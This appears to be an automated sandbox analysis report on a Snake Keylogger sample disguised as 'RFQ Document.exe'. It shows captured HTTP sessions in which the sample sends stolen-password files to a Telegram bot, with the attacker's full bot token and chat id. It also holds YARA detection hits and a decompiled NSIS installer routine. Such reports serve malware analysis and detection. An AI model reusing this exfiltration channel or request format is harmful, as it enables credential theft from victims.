{"ok":true,"result":{"message_id":12679,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808721,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
97	192.168.2.4	49873	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:42 UTC	155	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ce91498c Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:42 UTC	155	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 65 39 31 34 39 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ce91498cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:42 UTC	156	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:42 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:42 UTC	156	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12680,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808722,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
98	192.168.2.4	49874	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:42 UTC	156	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ceb76f1c Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:42 UTC	157	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 65 62 37 36 66 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ceb76f1cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:42 UTC	157	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:42 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:42 UTC	158	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12681,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808722,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
99	192.168.2.4	49875	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:42 UTC	158	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cecf467e Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:42 UTC	158	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 65 63 66 34 36 37 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cecf467eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:42 UTC	159	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:42 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:42 UTC	159	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12682,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808722,"d

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: RFQ Document.exe PID: 2628 Parent PID: 5288

General

Start time:	07:57:55
Start date:	28/09/2021
Path:	C:\Users\user\Desktop\RFQ Document.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\RFQ Document.exe'
Imagebase:	0x400000
File size:	344837 bytes
MD5 hash:	64468B2AB541687572CE6B435B41F2BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: RFQ Document.exe PID: 6484 Parent PID: 2628

General

Start time:	07:57:57
Start date:	28/09/2021
Path:	C:\Users\user\Desktop\RFQ Document.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\RFQ Document.exe'
Imagebase:	0x400000
File size:	344837 bytes
MD5 hash:	64468B2AB541687572CE6B435B41F2BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.926695160.00000000024D6000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.926695160.00000000024D6000.00000004.00000001.sdmp, Author: Joe Security Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, Author: Joe Security Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: RFQ Document.exe PID: 2628 Parent PID: 5288 RFQ Document.exeCOMMON

Executed Functions

Function 0040312A, Relevance: 80.8, APIs: 26, Strings: 20, Instructions: 315
stringfilecomCOMMON

Download Yara Rule

C-Code - Quality: 78%

			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t87;
				int _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t138;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F57(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056E5(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								_t57 =  &(_t56[2]);
								__eflags =  &(_t56[2]);
								E00405BC7("C:\\Users\\jones\\AppData\\Local\\Temp", _t57);
								L25:
								_t116 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116); // executed
								_t60 = E004030F9(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403540();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x42ecb4; // 0x0
											if(__eflags == 0) {
												L64:
												_t64 =  *0x42eccc; // 0xffffffff
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F57(5);
											_t119 = E00405F57(6);
											_t67 = E00405F57(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F57(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405488( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t138 =  *0x42ec3c; // 0x0
									if(_t138 == 0) {
										L36:
										 *0x42eccc =  *0x42eccc | 0xffffffff;
										 *(_t129 + 0x1c) = E0040361A( *0x42eccc);
										goto L37;
									}
									_t123 = E004056E5(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E0040540F(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\jones\\Desktop";
										if(lstrcmpiA(_t116, "C:\\Users\\jones\\Desktop") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053F2();
											} else {
												E00405375();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405BC7("C:\\Users\\jones\\AppData\\Local\\Temp", _t127);
											}
											E00405BC7(0x42f000,  *(_t129 + 0x20));
											 *0x42f400 = 0x41;
											_t128 = 0x1a;
											do {
												_t87 =  *0x42ec30; // 0x764fc8
												E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t87 + 0x120)));
												DeleteFileA(0x428c58);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\jones\\Desktop\\RFQ Document.exe", 0x428c58, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x428c58);
														E00405915(_t149);
														_t93 =  *0x42ec30; // 0x764fc8
														E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t93 + 0x124)));
														_t95 = E00405427(0x428c58);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x42f400 =  *0x42f400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E00405915(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040579B(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405BC7("C:\\Users\\jones\\AppData\\Local\\Temp", _t124);
									E00405BC7("C:\\Users\\jones\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030F9(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EE9(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F57(0xd);
					_t47 = E00405F57(0xb);
					 *0x42ec24 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x42ecd8 = _t47;
					SHGetFileInfoA(0x429058, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405BC7("iqbk Setup", "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\jones\\Desktop\\RFQ Document.exe\" ";
					E00405BC7(_t125, _t51);
					 *0x42ec20 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\jones\\Desktop\\RFQ Document.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M00434001;
					}
					_t56 = CharNextA(E004056E5(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}

0x0040313b
0x0040313f
0x00403147
0x0040314b
0x00403150
0x00403160
0x00403163
0x0040316a
0x00403171
0x00403171
0x0040316a
0x00403173
0x00403173
0x00403289
0x00403289
0x00403289
0x0040328b
0x0040328d
0x00000000
0x00000000
0x00403222
0x00403225
0x0040322d
0x0040322d
0x00403230
0x00403235
0x00403237
0x00403237
0x00403238
0x00403238
0x0040323d
0x00403240
0x00403279
0x0040327e
0x00403283
0x00403286
0x00403288
0x00403288
0x00403288
0x00000000
0x00403242
0x00403242
0x00403243
0x00403246
0x0040324e
0x00403251
0x00403253
0x00403253
0x00403253
0x00403253
0x00403251
0x00403258
0x0040325e
0x00403266
0x00403269
0x0040326b
0x0040326b
0x0040326b
0x0040326b
0x00403269
0x00403270
0x00403277
0x00403291
0x00403294
0x00403294
0x0040329d
0x004032a2
0x004032a2
0x004032ad
0x004032b3
0x004032b8
0x004032ba
0x004032e0
0x004032e5
0x004032ef
0x004032f6
0x004032fa
0x00403361
0x00403361
0x00403366
0x0040336c
0x00403370
0x00403485
0x0040348b
0x00403528
0x00403528
0x0040352d
0x00403530
0x00403532
0x00403532
0x0040353a
0x0040353a
0x0040349a
0x004034a3
0x004034a5
0x004034aa
0x004034ac
0x004034ae
0x004034b0
0x004034b2
0x004034b4
0x004034b6
0x004034c6
0x004034c8
0x004034ca
0x004034d7
0x004034e6
0x004034ee
0x004034f6
0x004034f6
0x004034ca
0x004034b6
0x004034b2
0x004034fa
0x004034ff
0x00403506
0x00403514
0x00403517
0x0040351d
0x0040351f
0x00000000
0x00000000
0x00000000
0x00403508
0x0040350e
0x00403510
0x00403512
0x00403521
0x00403523
0x00000000
0x00403523
0x00000000
0x00403512
0x00403506
0x0040337f
0x00403386
0x00403386
0x004032fc
0x00403302
0x00403351
0x00403351
0x0040335d
0x00000000
0x0040335d
0x0040330b
0x00403318
0x0040330f
0x00403315
0x00000000
0x00000000
0x00403317
0x00403317
0x00403317
0x0040331c
0x0040331e
0x00403326
0x00403397
0x00403399
0x004033a0
0x004033a8
0x004033a8
0x004033b3
0x004033b8
0x004033c7
0x004033cb
0x004033cc
0x004033d5
0x004033ce
0x004033ce
0x004033ce
0x004033db
0x004033e1
0x004033e7
0x004033ef
0x004033ef
0x004033fd
0x00403404
0x0040340d
0x00403413
0x00403413
0x0040341f
0x00403425
0x0040342f
0x00403439
0x0040343f
0x00403441
0x00403443
0x00403444
0x00403445
0x0040344a
0x00403456
0x0040345c
0x00403463
0x00403466
0x0040346c
0x0040346c
0x00403463
0x00403441
0x00403470
0x00403476
0x00403476
0x00403476
0x00403479
0x0040347a
0x0040347b
0x0040347b
0x00000000
0x004033c7
0x00403328
0x0040332a
0x00403335
0x00000000
0x00000000
0x0040333d
0x00403348
0x0040334d
0x00000000
0x0040334d
0x004032c2
0x004032ce
0x004032d3
0x004032d8
0x004032da
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00403277
0x00000000
0x00000000
0x00000000
0x00403227
0x00403227
0x00403227
0x00403228
0x00403228
0x00000000
0x00403227
0x00000000
